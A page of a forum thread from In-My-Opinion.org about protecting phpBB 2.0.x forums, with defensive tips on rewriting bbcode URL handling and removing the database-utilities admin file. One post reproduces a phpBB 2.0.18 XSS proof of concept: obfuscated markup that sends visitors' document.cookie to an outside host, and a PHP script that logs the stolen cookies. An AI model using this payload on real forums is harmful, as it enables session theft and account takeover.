In-My-Opinion.org

»How to protect your phpBB forum against hackers«


Ninja:
So what's the best way to protect my shared_config file, and if possible, can someone modify the Encrypt Your Config mod to work with the Shared Registration mod too?

That's not possible, since the decryption algorithm is based upon the installation path of your forum. Since you are using the same config.php for MULTIPLE installations it cannot be decrypted.


posted by knn
  

in-my-opinion.org -> Technology, Computers, Science, Internet -> Software by the admin -> How to protect your phpBB forum against hackers



knn:
This is a general issue with a lot of scripts, not only with phpBB

You might do this:
Open "common.php"

I have added tip #15 which takes care of this


posted by knn
  

Another 2.0.18 Exploit?


opic : phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept

ExploitAlert Id : 193

Credit : jet

Date : 22.12.2005

Exploit Code :

# SecurityReason Source :
#

# More :

/******************************************************************

phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
-- 'the html is on exploit'

original exploit by: Maksymilian Arciemowicz (cXIb8O3) - 12/16/2005
--

proof of concept by: jet
--


develop a pure, lucid mind, not
depending upon sound, flavor,
touch, odor, or any quality.
- the diamond sutra

******************************************************************/

phpbb code:

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));
'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.s
ss=null`style='font-size:0; X="<B ">'</B>

c.php:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);

?>


posted by redred23
  



redred23:
Another 2.0.18 Exploit?

Sure, there are dozens of bugs like that in phpBB. But full path disclosure is a minor issue compared to get your forum deleted.

Moreover the above hack only works if you allow html tags in your posts. You should turn them off. They are completely unnecessary and can be source of many hacks.


posted by knn
  

2.0.19 oy veh!


In your protection, you do this:
Quote:
phpBB asks you to use this code:

// matches a xxxx... code..
$patterns[] = "#\[url\]([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url1'];

// phpbb.com... code.. (no xxxx:// prefix).
$patterns[] = "#\[url\]((www|ftp)\.[\w\#$%&~/.\-;:=,?@\[\]+]*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url2'];

// xxxx... code..
$patterns[] = "#\[url=([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\]([^?\n\r\t].*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url3'];

// phpbb.com... code.. (no xxxx:// prefix).
$patterns[] = "#\[url=((www|ftp)\.[\w\#$%&~/.\-;:=,?@\[\]+]*?)\]([^?\n\r\t].*?)\[/url\]#is";

Do you trust this monster? Me not.

It calls the [ url ] handling 4 times and has been used (prior to 2.0.17) to steal cookies/passwords. Since 2.0.17 the code has been fixed, but I still don't trust it.

Thus open bbcode.php and find the 4 lines that start with $patterns[] = "#\[url
and are followed by $replacements[] =


Delete all these 8 lines and replace all 8 lines with the following
$security_threat_chars = ' \t\r\n\'\"\`\[\]\<\>\\\\';
$text = preg_replace('$\[url=?.*?(http://|ftp://)?(www[.])?([a-zA-Z0-9-.]+)([^'.$security_threat_chars.']*).*?\[\/url\]$i','<a href="http://\\1\\2\\3\\4" title="http://\\1\\2\\3\\4" target="_blank" class="postlink">\\3...</a>',$text);
$text = preg_replace('$"http://(http://|ftp://)$i','"\\1',$text); // Replace a double "http://" to -> "http://"

A nice side effect is that • long URLs get cut and don't distort the width of your forum
• the "www." doesn't get displayed

So we are actually not only fixing a possible security hole but we are enhancing the URL handling

Now in PHPBBs update to 2.0.19 they want to do the following, however that code is now GONE! What should I do (they have not answered me yet)
Quote:
#-----[ OPEN ]---------------------------------------------
#
includes/bbcode.php

#
#-----[ FIND ]---------------------------------------------
# Line 203
$patterns[] = "#\[url\]([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url1'];

// phpbb.com... code.. (no xxxx:// prefix).
$patterns[] = "#\[url\]((www|ftp)\.[\w\#$%&~/.\-;:=,?@\[\]+]*?)\[/url\]#is";

#
#-----[ REPLACE WITH ]---------------------------------------------
#
$patterns[] = "#\[url\]([\w]+?://([\w\#$%&~/.\-;:=,?@\]+]|\[(?url=))*?)\[/url\]#is";
$replacements[] = $bbcode_tpl['url1'];

// phpbb.com... code.. (no xxxx:// prefix).
$patterns[] = "#\[url\]((www|ftp)\.([\w\#$%&~/.\-;:=,?@\]+]|\[(?url=))*?)\[/url\]#is";

should I just skip this spot and change thier other items or what... Silly and stupid, that's how I feel


posted by Sippenhaft
  Rebellion is the only way to reform!

2.0.19 oy veh part 2


They also have you changing items in the admin db utilities, which for those that use KNNs protection have removed I learned something new, I guess

I cant tell if this update is just fluff or does some good US prisoner

What? When? Where? Why?

posted by Sippenhaft
  



Sippenhaft:
Now in PHPBBs update to 2.0.19

Uff, these tinkers.
Sippenhaft:
they want to do the following, however that code is now GONE!

Actually I don't know what the new code prevents, so I cannot tell anything right now.


posted by knn
  



Sippenhaft:
They also have you changing items in the admin db utilities, which for those that use KNNs protection have removed

?


posted by knn
  



Quote:
?

Tip A: "admin_db_utilities.php" is probably the most important (= severe) of files and the most unimportant (= useless for everyday's admin's life). Simply delete (or rename) the file "admin/admin_db_utilities.php"
If a attacker should gain control over your administration panel then at least he has no control over your database. If you don't delete the above file, an attacker who logs in as admin can alter ANY data in your database or delete the database completely:
With the 3 words

They do some updates to this file. Soooo if you have removed it, you cant do their updates... Aaah, is there anything better than to post here and to drink something


posted by Sippenhaft
  



Sippenhaft:
They do some updates to this file. Soooo if you have removed it, you cant do their updates...

Remove this file from your webspace. Only copy it back when you need it. But of course you should apply updates to that file, so you have the newest version IF you need it.


posted by knn
  



Thanks for all the good information (Security Tips) Thumb Up

Peter. Wink This is a very beautiful board also.

Kind Regards.

posted by Gismo1
  



Well I have finished the update and left YOUR security as is in the bbcode. I skipped their one step of:
Quote:
In your protection, you do this:
Quote:phpBB asks you to use this code:

// matches a xxxx... code.. 
$patterns[] = "#\[url\]([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\[/url\]#is"
$replacements[] = $bbcode_tpl['url1']; 

// phpbb.com... code.. (no xxxx:// prefix). 
$patterns[] = "#\[url\]((www|ftp)\.[\w\#$%&~/.\-;:=,?@\[\]+]*?)\[/url\]#is"
$replacements[] = $bbcode_tpl['url2']; 

// xxxx... code.. 
$patterns[] = "#\[url=([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\]([^?\n\r\t].*?)\[/url\]#is"
$replacements[] = $bbcode_tpl['url3']; 

// phpbb.com... code.. (no xxxx:// prefix). 
$patterns[] = "#\[url=((www|ftp)\.[\w\#$%&~/.\-;:=,?@\[\]+]*?)\]([^?\n\r\t].*?)\[/url\]#is"



Do you trust this monster? Me not.

It calls the [ url ] handling 4 times and has been used (prior to 2.0.17) to steal cookies/passwords. Since 2.0.17 the code has been fixed, but I still don't trust it.

Thus open bbcode.php and find the 4 lines that start with $patterns[] = "#\[url
and are followed by $replacements[] =


Delete all these 8 lines and replace all 8 lines with the following

$security_threat_chars ' \t\r\n\'\"\`\[\]\<\>\\\\'; 
$text = preg_replace('$\[url=?.*?(http://|ftp://)?(www[.])?([a-zA-Z0-9-.]+)([^'.$security_threat_chars.']*).*?\[\/url\]$i','<a href="http://\\1\\2\\3\\4" title="http://\\1\\2\\3\\4" target="_blank" class="postlink">\\3...</a>',$text); 
$text preg_replace('$"http://(http://|ftp://)$i','"\\1',$text); // Replace a double "http://" to -> "http://" 



A nice side effect is that • long URLs get cut and don't distort the width of your forum
• the "www." doesn't get displayed

So we are actually not only fixing a possible security hole but we are enhancing the URL handling

Now in PHPBBs update to 2.0.19 they want to do the following, however that code is now GONE! What should I do (they have not answered me yet)

Quote:#-----[ OPEN ]--------------------------------------------- 

includes/bbcode.php 


#-----[ FIND ]--------------------------------------------- 
# Line 203 
$patterns[] = "#\[url\]([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\[/url\]#is"
$replacements[] = $bbcode_tpl['url1']; 

// phpbb.com... code.. (no xxxx:// prefix). 
$patterns[] = "#\[url\]((www|ftp)\.[\w\#$%&~/.\-;:=,?@\[\]+]*?)\[/url\]#is"


#-----[ REPLACE WITH ]--------------------------------------------- 

$patterns[] = "#\[url\]([\w]+?://([\w\#$%&~/.\-;:=,?@\]+]|\[(?url=))*?)\[/url\]#is"
$replacements[] = $bbcode_tpl['url1']; 

// phpbb.com... code.. (no xxxx:// prefix). 
$patterns[] = "#\[url\]((www|ftp)\.([\w\#$%&~/.\-;:=,?@\]+]|\[(?url=))*?)\[/url\]#is"


All seems fine! Thanks! Thumb Up


posted by Sippenhaft
  

phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin


Is there a fix for the 2.0.19 exploit?

Details: SecurityAlert
Topic : phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin
SecurityAlert Id : 31
SecurityRisk : Medium
Remote Exploit : Yes
Local Exploit : Yes
Exploit Given : Yes
Credit : Maksymilian Arciemowicz
Date : 3.2.2006

posted by phpbbsupport
  



phpbbsupport:
Is there a fix for the 2.0.19 exploit?

Let me say first: This exploit is CAUSED AGAIN by the amateurish programming of phpBB.

Let me say second: My tips protect you.


posted by knn
  

ERROR FOUND!


See IMO → Hacking attempt?

posted by Sippenhaft
  



Goto page Previous  
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15  Next

Reply to topic
Goto page Previous  
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15  Next






RegisterRegister
Log inLog in
 		The time now is 6 July 2008, 04:15
php B.B.